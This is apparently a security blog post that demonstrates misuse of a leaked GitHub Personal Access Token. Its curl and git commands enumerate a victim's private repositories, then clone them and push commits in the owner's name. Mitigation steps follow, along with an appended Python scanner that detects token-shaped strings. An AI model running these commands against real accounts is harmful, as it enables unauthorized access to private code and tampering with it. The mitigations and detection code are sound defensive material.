GitHub's Personal Access Tokens are used for authentication, and leaving one somewhere in your configs or notes can lead to disaster, depending on how much access you have granted to that token.

Anyone with access to this token can gain unauthorized access to your GitHub account and misuse it for their own advantage.

For example:

  • Read or write to private repos
  • Delete repos
  • Modify code
  • Access sensitive data
  • Escalate privileges, change repo settings, etc.
  • Act on behalf of your identity

This is my proof of concept to demonstrate a simple attack against a publicly exposed PAT: using it to access private repositories and push unauthorized code changes on behalf of the GitHub account owner.

Exploiting Github’s PAT to Enumerate Private Repositories

This is my Personal Access Token:

ghp_R7DSrylV1usometoken4FK7lc

Don't try to attack it, because it's already been revoked. :p

This is what yours will look like too. To learn about generating one, click on this link.

Leverage GitHub’s REST API

Making an API Request to Enumerate Repositories

GitHub’s REST API allows you to interact with user data, including listing their private repositories.

Generate a Request with the Personal Access Token

The endpoint for listing repositories is:

GET /user/repos

However, you need to add an authorization header with the personal access token to authenticate. You can do this using curl, Python (requests), or other HTTP clients.

We will use curl to enumerate repos.

curl -H "Authorization: token <your_personal_access_token>" "https://api.github.com/user/repos" 

This will return a JSON response with the list of both public and private repos.

But we only want private repos, so we append ?visibility=private to the URL. That still returns the full repository objects, and we only want a list of repo URLs, so jq, a command-line JSON processor, comes to the rescue.

So the full command looks like this:

curl -H "Authorization: token ghp_R7DSrylV1uUoxxxxxxSUcfBXl2E4FK7lc" "https://api.github.com/user/repos?visibility=private" | jq -r '.[].html_url'

Expected output:

https://github.com/elon/x-secret-project
https://github.com/elon/ai-countermeasures
https://github.com/elon/my-friends-on-mars

Now that we know we have access to private repos, let's try modifying and pushing code to one of the repositories.

But first we clone the repo using the token, because it is private.

Git cloning the repo

# syntax
git clone https://username:<token>@github.com/username/repository.git

# command in my case
git clone https://srngx:ghp_R7DSrylV1uUoPT2HhSSxxxSUcfBXl2E4FK7lc@github.com/srngx/private_repo.git

Pushing to Repo

touch somefile
git add somefile
git commit -m "testing PAT"

Push using the token

git push origin main

When asked for a password, use the token instead.

Also, if you're passing the token in the clone URL (as shown earlier), git will authenticate the push automatically, and you won't be prompted for a username/password.

git push https://username:ghp_exampletoken1234@github.com/username/private-repo.git

Note

If you don't have a GitHub global config set up, the commit will use the private repo owner's name and email. But if you want to leave your imprint (which a malicious hacker normally won't do) and add yourself to the contributors list of your victim's GitHub repo, you can set up the global config.

git config --global user.name "your name"
git config --global user.email "you@email.com"

You can also use a Git credential helper to store your credentials securely, so you don't have to enter the username and password manually every time you run git push.

git config --global credential.helper cache

Mitigations

Mitigation Steps If a PAT Is Exposed

If you’ve exposed your PAT publicly, take immediate action to protect your account:

  1. Revoke the exposed PAT.
  2. Generate a new PAT:
     • Create a new token, and this time try not to expose it.
  3. Audit your account:
     • Review recent activity in your repositories for any suspicious actions (commits, issues, pull requests, etc.).
     • Check whether any unauthorized changes were made to your repositories or account settings.
  4. Use more secure storage for tokens:
     • Environment variables: store tokens in environment variables, not in the code.
     • Password managers: use a password manager to securely store and manage tokens.
     • GitHub Secrets: for CI/CD pipelines, use GitHub Actions secrets or another secure vault to store tokens.
  5. Set appropriate scopes for PATs:
     • Always limit the scope of your tokens to the least privilege required. For example, if you only need read access, do not grant write or admin access.
  6. Enable two-factor authentication (2FA):
     • Enable two-factor authentication on your GitHub account for an added layer of protection in case your credentials are compromised.
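Tokens most often leak exactly the way this post describes: a ghp_ string pasted into notes, a shell history or a clone URL. As an added example that is not part of the original post, here is a small Python scanner to run over such files before they are committed or shared. The regexes follow the token prefix formats GitHub has published (classic tokens are a three-letter prefix plus 36 base62 characters; fine-grained tokens are github_pat_ plus 22 characters, an underscore and 59 characters); the sample notes file and both tokens in it are constructed placeholders.

```python
import re
import sys
from typing import List, NamedTuple

# Token shapes GitHub has published: classic tokens are a 3-letter prefix plus 36
# base62 characters (ghp_ = personal access token, the kind this page leaks;
# gho_/ghu_/ghs_/ghr_ = OAuth, user-to-server, server-to-server and refresh tokens);
# fine-grained PATs are github_pat_ + 22 chars + "_" + 59 chars.
TOKEN_PATTERNS = {
    "classic": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "fine_grained": re.compile(r"\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}\b"),
}

class Finding(NamedTuple):
    line_no: int
    kind: str
    masked: str  # the report must not become a second copy of the secret

def mask(token: str) -> str:
    """Keep the prefix and last 4 chars so the owner can tell which token to revoke."""
    return token[:8] + "..." + token[-4:]

def scan_text(text: str) -> List[Finding]:
    """Return one Finding per token-shaped string, with line numbers for triage."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in TOKEN_PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append(Finding(line_no, kind, mask(match.group())))
    return findings

def scan_file(path: str) -> List[Finding]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())

# Constructed sample notes file; both tokens are made-up placeholders, not real.
SAMPLE_NOTES = """\
# deploy notes
export GITHUB_TOKEN=ghp_abcdefghijklmnopqrstuvwxyz0123456789
git clone https://srngx:ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@github.com/srngx/private_repo.git
fine-grained: github_pat_ABCDEFGHIJKLMNOPQRSTUV_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVW
not a token: ghp_short
"""

if __name__ == "__main__":
    # Pre-commit style use: pass file paths, exit 1 if anything token-shaped is found.
    paths = sys.argv[1:]
    hits = [(p, f) for p in paths for f in scan_file(p)] if paths else \
           [("<sample>", f) for f in scan_text(SAMPLE_NOTES)]
    for path, f in hits:
        print(f"{path}:{f.line_no}: {f.kind} token {f.masked}")
    sys.exit(1 if hits else 0)
```

Run with no arguments to see it flag the three constructed tokens in SAMPLE_NOTES; wire it into a pre-commit hook with your own paths so a leaked token never reaches a public repo in the first place.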